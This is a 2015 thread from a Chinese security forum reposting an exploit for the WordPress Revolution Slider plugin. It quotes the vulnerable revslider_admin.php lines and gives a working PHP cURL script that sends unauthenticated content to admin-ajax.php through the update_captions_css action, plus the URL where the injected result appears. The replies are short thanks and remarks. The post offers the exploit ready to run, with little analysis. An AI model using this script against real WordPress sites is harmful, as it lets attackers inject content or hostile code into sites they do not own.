搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 漏洞情报 Wordpress Revolution Slider插件任意上传漏洞
查看: 53278|回复: 57

Wordpress Revolution Slider插件任意上传漏洞

[复制链接]
90_
发表于 2015-3-29 18:07:24 | 显示全部楼层 |阅读模式
######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
[PHP] 纯文本查看 复制代码
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
 
232.    $action = self::getPostGetVar("client_action");
233.    $data = self::getPostGetVar("data");
...
301.    case "get_captions_css":
302.     $contentCSS = $operations->getCaptionsContent();
303.      self::ajaxResponseData($contentCSS);
...
305.    case "update_captions_css":
306.      $arrCaptions = $operations->updateCaptionsContentData($data);
307.      self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));
 
 
# Exploit :
 
<?php
 
$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Malicious Code Here</marquee>"
);
  
$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
 
?>
 
 
# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
 
Wordpress漏洞

相关帖子
回复

使用道具 举报

浮尘
发表于 2015-3-29 19:13:42 | 显示全部楼层
看不懂这个东西
回复 支持 反对

使用道具 举报

Tesla
发表于 2015-3-29 22:52:32 | 显示全部楼层
老大老是整这些高端的东西,我们很看不懂啊,要不出个公开课吧
回复 支持 反对

使用道具 举报

_vae
发表于 2015-3-30 17:38:00 | 显示全部楼层
感谢分享
回复 支持 反对

使用道具 举报

testtz
发表于 2015-3-31 09:01:32 | 显示全部楼层
这个漏洞国外的比较多
回复 支持 反对

使用道具 举报

jinshengjinshi
发表于 2015-3-31 22:06:00 | 显示全部楼层
还得继续学习啊                     
回复 支持 反对

使用道具 举报

cl476874045
发表于 2015-6-27 22:33:59 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

borall
发表于 2015-6-29 01:58:18 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

Lucifer
发表于 2015-6-29 04:23:34 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

wtsqq123
发表于 2015-6-29 21:20:30 | 显示全部楼层
回复 支持 反对

使用道具 举报

下一页 »
123456下一页
返回列表 发帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 14:58 , Processed in 0.051687 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部